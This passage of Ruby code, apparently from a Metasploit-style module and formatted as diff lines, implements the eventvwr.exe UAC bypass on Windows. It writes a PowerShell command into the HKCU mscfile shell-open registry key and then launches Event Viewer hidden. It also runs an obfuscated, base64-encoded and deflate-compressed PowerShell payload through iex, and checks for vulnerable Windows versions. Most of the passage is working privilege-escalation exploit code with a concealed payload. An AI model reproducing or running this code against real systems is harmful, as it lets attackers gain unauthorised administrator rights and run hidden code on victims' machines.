registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ') + if result + execute_script("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBlADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAcABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAHYAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQBzAGcAZgBQADMANQA4AEgAegA4AGkALwBxAC8ALwArADkAZgA0ADMAWAA2AE4AKwB0AGQAWQAvAHgAcgB0AHIANQBIADkARwB1AG0AdgA4AFIAbgA5AC8ANgBOAGYANAA5AHUALwB4AHUALwAxAGEANQB6ADgARwBsAC8AOQBHAG8AOQArAGoAZAAvADMAMQAzAGoAOQBhADEAUwAvAHgAagBsADkAZQAwAFgAZgAxADcAOQBHAFQAcAArAGMALwBCAG8AbAAvAGQANwBRAGYAegBuADkALwAvAGYAOQBOAFIAYgAwADcANQBUAGEARgBQAFEANQB2AG0AOQArAGoAVABuADkATABPAG0ALwAzADUAZgBlAFgAZABIAHYAUwAvAHAAdABTAHIAOAB2ADYATAArAE0ALwBwAHAAUgBIADcALwB4AHIANQBGAFEAegB4AFgAQgBuAEgARQBMADYAWAB2AHIAMQAvAGkAYwAvAG0AcAAvAGoAZQAxAGYANAA0AHoAKwB6AGEAbgA5AFMAMgBvAGgAVQBHAHIANgA1AEoAcgBhAGIATgBOAG4ARwBmADAAKwBwADkAOQA5ADMATABkAC8AagBSAGYAMABjADAARQB0ADAAMQAvAGoANAAxADkAagBRAG0AMQBYAGkAdQBmAEgAdgA4AGEAZABYADIATQBjAGYASQBMAGUAWAAxAEQATABLADYAKwBuAEwAcgBSAG4AagBOADIAVQA0AGYAMABNAC8AYgAvAGIAUABvAGEAWgBqADgASABXAHIALwBHAFUAZgBqAHUAbgBUADkAWgBFAGkANQBaAHcAKwBKAGoAYgAvAEMAUgA5AFUAdABKAG4ATwBmAGYAbwBVADIAQwA3AEIALwBNAE4ANAA0AHkAVwBEAGYAMQBkAEUANAAyAFgAdgA4AFoARgBGAEwAcwB2AEcAWABOAGcAZwBOADcASwAvAHcAYwA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=") + print_good('Created registry entries to hijack!') + end + + r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true}) + check_permissions! + + end + + def validate_environment! + fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system? + + winver = sysinfo['OS'] + + unless winver =~ /Windows Vista|Windows 2008|Windows [78]/ + fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") + end + + if is_uac_enabled? + print_status 'UAC is Enabled, checking level...' + else + if is_in_admin_group? + fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + end +end